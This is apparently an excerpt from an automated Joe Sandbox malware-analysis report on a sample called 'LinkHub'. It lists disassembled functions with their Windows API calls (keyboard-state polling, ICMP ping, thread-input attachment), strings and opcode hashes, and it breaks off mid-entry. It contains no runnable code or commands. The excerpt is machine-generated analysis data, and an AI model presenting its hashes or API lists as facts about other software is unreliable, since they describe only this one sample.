Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: f0365b1a706afa060fe4ccc4b924c89f7a45f1e3160926209f1ae8f9d5426f94
Instruction ID: 9c171aac6ec83d1d83e14ef747d44403deae9c547269ed545d6f090963a030e6
Opcode Fuzzy Hash: f0365b1a706afa060fe4ccc4b924c89f7a45f1e3160926209f1ae8f9d5426f94
Instruction Fuzzy Hash: FB415F35A002199FCF10EFA5D9449AEBBF9EF48344F0084A9E915A7361CB34A945CF90

Function 00B6A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B6A65D
GetAsyncKeyState.USER32(000000A0), ref: 00B6A6DE
GetKeyState.USER32(000000A0), ref: 00B6A6F9
GetAsyncKeyState.USER32(000000A1), ref: 00B6A713
GetKeyState.USER32(000000A1), ref: 00B6A728
GetAsyncKeyState.USER32(00000011), ref: 00B6A740
GetKeyState.USER32(00000011), ref: 00B6A752
GetAsyncKeyState.USER32(00000012), ref: 00B6A76A
GetKeyState.USER32(00000012), ref: 00B6A77C
GetAsyncKeyState.USER32(0000005B), ref: 00B6A794
GetKeyState.USER32(0000005B), ref: 00B6A7A6

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 88397c60b6e992bb8f7fb711ea58cb4184bb4725b9b8759f4702514f61acda50
Instruction ID: a90e32ab8661475215361fb1a65529403bf61efb25ac9c6230ec53fdc16493fe
Opcode Fuzzy Hash: 88397c60b6e992bb8f7fb711ea58cb4184bb4725b9b8759f4702514f61acda50
Instruction Fuzzy Hash: 504143645047C969FF315A64C5443B5BEF0EB22344F0880DAD6C66B5C2EB9C9DC48F63

Function 00B80FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B81019
inet_addr.WSOCK32(?), ref: 00B81079
gethostbyname.WSOCK32(?), ref: 00B81085
IcmpCreateFile.IPHLPAPI ref: 00B81093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B81123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B81142
IcmpCloseHandle.IPHLPAPI(?), ref: 00B81216
WSACleanup.WSOCK32 ref: 00B8121C

Strings

Ping, xrefs: 00B810D3

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: e6be344c5d4163e220a1675030a38e36081bb86bb0da0be9e428861cfba621ac
Instruction ID: b7cb4fec86c1fbc69c88d881a664f195f0f030e627085ad38c15396a67b2c5d0
Opcode Fuzzy Hash: e6be344c5d4163e220a1675030a38e36081bb86bb0da0be9e428861cfba621ac
Instruction Fuzzy Hash: B9917D716052419FD720EF19C888F16BBE8EF44318F1489E9F5699B6B2C731ED86CB81

Function 00B89730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00B89750

Part of subcall function 00B69805: _wcslen.LIBCMT ref: 00B69828

_wcslen.LIBCMT ref: 00B897AB
_wcslen.LIBCMT ref: 00B897F9
_wcslen.LIBCMT ref: 00B89839
_wcslen.LIBCMT ref: 00B898CB

Strings

winapi, xrefs: 00B897F3, 00B897F8
cdecl, xrefs: 00B897A5, 00B897AA
stdcall, xrefs: 00B89833, 00B89838
none, xrefs: 00B898C2, 00B898C7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: e7bf074baa13359fbfada8443e2b958a49cca6f1da4e0f56c763de43c646d177
Instruction ID: f8f19fc66efe0c968898f5aac6b58e258f54e0f9ee76dc7e70d1617d5a4ea9dc
Opcode Fuzzy Hash: e7bf074baa13359fbfada8443e2b958a49cca6f1da4e0f56c763de43c646d177
Instruction Fuzzy Hash: AE51B431A001179BCF14EF6CC9909BEB7E5FF65360B2442A9E866E76A4DB31DD40C790

Function 00B84189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00B841D1
CoUninitialize.OLE32 ref: 00B841DC
CoCreateInstance.OLE32(?,00000000,00000017,00BA0B44,?), ref: 00B84236
IIDFromString.OLE32(?,?), ref: 00B842A9
VariantInit.OLEAUT32(?), ref: 00B84341
VariantClear.OLEAUT32(?), ref: 00B84393

Strings

Failed to create object, xrefs: 00B84241, 00B842F7
NULL Pointer assignment, xrefs: 00B8427B
Invalid parameter, xrefs: 00B842C2

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 6227f3c093c87b7d5e7545e31ca6883a9f132df5081ba8a41588fe1bb06f3444
Instruction ID: 12315da752142a17adf8279c5b3b458ec0f7dc309f8b58696c385fb9a7162981
Opcode Fuzzy Hash: 6227f3c093c87b7d5e7545e31ca6883a9f132df5081ba8a41588fe1bb06f3444
Instruction Fuzzy Hash: 1161A071608702DFC710EF64D988F6ABBE4EF49714F00499AF9859B2A1DB70ED44CB92

Function 00B78BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B78C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B78CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B78CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B78D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00B78D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00B78D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B78DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00B78DDA

Strings

*.*, xrefs: 00B78DE0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: cadd9918b579eaaa38ee3ad21769c702bfbbb3b4c5b89bd02aa4b9bd37f50e43
Instruction ID: b9272a465264fa431147ac593e790f94994a1253fc9e75581791c9699fc09fd5
Opcode Fuzzy Hash: cadd9918b579eaaa38ee3ad21769c702bfbbb3b4c5b89bd02aa4b9bd37f50e43
Instruction Fuzzy Hash: 78614C725043059FCB10EF60C84599EB7E8FF99310F0489AEF999C7291DB35E945CB92

Function 00B946E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00B94715
SetMenu.USER32(?,00000000), ref: 00B94724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B947AC
IsMenu.USER32(?), ref: 00B947C0
CreatePopupMenu.USER32 ref: 00B947CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B947F7
DrawMenuBar.USER32 ref: 00B947FF

Strings

0, xrefs: 00B946F0
F, xrefs: 00B947EA

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 8fc8dc58b2bb3e12ea2f5b97274f57d3554d2dec160053e29d00bb4cce7fadb3
Instruction ID: a991865e9211063e24620c0d57e3024858e8618c8232a1f17c27f6e74730553a
Opcode Fuzzy Hash: 8fc8dc58b2bb3e12ea2f5b97274f57d3554d2dec160053e29d00bb4cce7fadb3
Instruction Fuzzy Hash: 48418775A01209AFDF14CFA5D984EEA7BF5FF0A314F144069FA05A7360DB74A911CB50

Function 00B6282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B64620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B628B1
GetDlgCtrlID.USER32 ref: 00B628BC
GetParent.USER32 ref: 00B628D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B628DB
GetDlgCtrlID.USER32(?), ref: 00B628E4
GetParent.USER32(?), ref: 00B628F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B628FB

Strings

ListBox, xrefs: 00B6286E
ComboBox, xrefs: 00B62839

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: a055796487d905692df78ebd01500a2ea090596d84e178b93a20f158a1833019
Instruction ID: 10e6eea7e6656fd2d235db0c794f3cedf86833f36cfa4fc597548c97d8d9c467
Opcode Fuzzy Hash: a055796487d905692df78ebd01500a2ea090596d84e178b93a20f158a1833019
Instruction Fuzzy Hash: 66219275A00118BBDF05AFA1CC85EEEBBF4EF05350F1041AAB951A72E1DB795809DB60

Function 00B6290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B64620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00B62990
GetDlgCtrlID.USER32 ref: 00B6299B
GetParent.USER32 ref: 00B629B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B629BA
GetDlgCtrlID.USER32(?), ref: 00B629C3
GetParent.USER32(?), ref: 00B629D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B629DA

Strings

ListBox, xrefs: 00B6294F
ComboBox, xrefs: 00B6291A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 27143774251da6acb7b31afcb9573a650e738f2846f703afefd6f06b3ffe14e9
Instruction ID: 0b203e199be26c6f0867c0e90a1d185a297ca52df8047dda4483178762b352e4
Opcode Fuzzy Hash: 27143774251da6acb7b31afcb9573a650e738f2846f703afefd6f06b3ffe14e9
Instruction Fuzzy Hash: CE21A175E00118BBDF01AFA0CC85EEEBBF8EF05340F1041A6B951A71E1CB794809DB60

Function 00B944BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B94539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B9453C
GetWindowLongW.USER32(?,000000F0), ref: 00B94563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B94586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B945FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B94648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B94663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B9467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B94692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B946AF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 7beb3fa476d3610ff8532bf46c9916f8077b3392f24aabeddaf3a06e81aa28ab
Instruction ID: ced6e254763c1cfadb5ae8fc0a33d8ed351ed282c3f0b9e1a0ddde12f7c8b936
Opcode Fuzzy Hash: 7beb3fa476d3610ff8532bf46c9916f8077b3392f24aabeddaf3a06e81aa28ab
Instruction Fuzzy Hash: 18615DB5A00258AFDB10DFA4CC81EEE77F8EF09710F1001AAFA14A72A1D774A946DB50

Function 00B6BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B6BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B6ABA8,?,00000001), ref: 00B6BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00B6BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B6ABA8,?,00000001), ref: 00B6BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B6BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B6ABA8,?,00000001), ref: 00B6BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B6ABA8,?,00000001), ref: 00B6BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B6ABA8,?,00000001), ref: 00B6BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B6ABA8,?,00000001), ref: 00B6BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B6ABA8,?,00000001), ref: 00B6BBE4

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 26106ce10b8042ba58a3818630249ad4a06fa76652c64355366277faa7259b98
Instruction ID: bc7e347d5dbbc1be7f62dfcf66f75894617b8df2ea08c9db48922f1aa21c82a0
Opcode Fuzzy Hash: 26106ce10b8042ba58a3818630249ad4a06fa76652c64355366277faa7259b98
Instruction Fuzzy Hash: 0B319172A05204AFDB119B15DDD4F69B7F9EB49352F148056FB05D71A4EBB89C808B20

Function 00B32FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B33007

Part of subcall function 00B32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3DB51,?,00000000,?,00000000,?,00B3DB78,?,00000007,?,?,00B3DF75,?), ref: 00B32D4E
Part of subcall function 00B32D38: GetLastError.KERNEL32(?,?,00B3DB51,?,00000000,?,00000000,?,00B3DB78,?,00000007,?,?,00B3DF75,?,?), ref: 00B32D60

_free.LIBCMT ref: 00B33013
_free.LIBCMT ref: 00B3301E
_free.LIBCMT ref: 00B33029
_free.LIBCMT ref: 00B33034
_free.LIBCMT ref: 00B3303F
_free.LIBCMT ref: 00B3304A
_free.LIBCMT ref: 00B33055
_free.LIBCMT ref: 00B33060
_free.LIBCMT ref: 00B3306E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e08785799c8aa47b376a2224619e6bd5313a58344fe523281057dbd2cabf6762
Instruction ID: 9663f41f6ff284c01a4654f02b102fc78657a15d568cee275d4b0235437f502c
Opcode Fuzzy Hash: e08785799c8aa47b376a2224619e6bd5313a58344fe523281057dbd2cabf6762
Instruction Fuzzy Hash: 28118376500108BFCB05EF94D942DDD3BE5EF09350FA185E5FA089F222DA32EE519B90

Function 00B78835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B789F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00B78A06
GetFileAttributesW.KERNEL32(?), ref: 00B78A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B78A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00B78A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00B78AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B78AF5

Strings

*.*, xrefs: 00B78AAB

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: e872b6b8516d25ead5f35a59aae7ad7e7bbc0d31fa0af4c85230728605baba7b
Instruction ID: 21f280725030918713d09cd4cb271ea1d74dea88bb50a51cab391820bd208584
Opcode Fuzzy Hash: e872b6b8516d25ead5f35a59aae7ad7e7bbc0d31fa0af4c85230728605baba7b
Instruction Fuzzy Hash: C081A1719443009BCB24EF14C488ABAB7E8FF94310F58889AF9ADD7250DF35DA458B92

Function 00B07447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00B074D7

Part of subcall function 00B07567: GetClientRect.USER32(?,?), ref: 00B0758D
Part of subcall function 00B07567: GetWindowRect.USER32(?,?), ref: 00B075CE
Part of subcall function 00B07567: ScreenToClient.USER32(?,?), ref: 00B075F6

GetDC.USER32 ref: 00B46083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B46096
SelectObject.GDI32(00000000,00000000), ref: 00B460A4
SelectObject.GDI32(00000000,00000000), ref: 00B460B9
ReleaseDC.USER32(?,00000000), ref: 00B460C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B46152

Strings

U, xrefs: 00B46021

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: ff182c3ac59152732ec0b7dc7dd88c9a247d7a46b6f09dcad51cd55882ee1142
Instruction ID: 16a23d5461e3780cbfbe4de4b266712e6e2452bd30325f0b8b8d115e7cb7a3d3
Opcode Fuzzy Hash: ff182c3ac59152732ec0b7dc7dd88c9a247d7a46b6f09dcad51cd55882ee1142
Instruction Fuzzy Hash: 9D71AE31900205DFCF258F64C8C4AAA7FF5FF4A320F1446EAE9556B2A6CB319D41EB52

Function 00B9955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B024B0

Part of subcall function 00B019CD: GetCursorPos.USER32(?), ref: 00B019E1
Part of subcall function 00B019CD: ScreenToClient.USER32(00000000,?), ref: 00B019FE
Part of subcall function 00B019CD: GetAsyncKeyState.USER32(00000001), ref: 00B01A23
Part of subcall function 00B019CD: GetAsyncKeyState.USER32(00000002), ref: 00B01A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00B995C7
ImageList_EndDrag.COMCTL32 ref: 00B995CD
ReleaseCapture.USER32 ref: 00B995D3
SetWindowTextW.USER32(?,00000000), ref: 00B9966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B99681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00B9975B

Strings

@GUI_DRAGFILE, xrefs: 00B996F6
@GUI_DROPID, xrefs: 00B996AD

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 3e66a2bef2db77413829e0ff563c4960caa0a4f053b54158eb19e29d98b46360
Instruction ID: 698f37f251347e7aeb081b5c2cc5b76f44dbf29a2b87c24e8daa9d7344f705e9
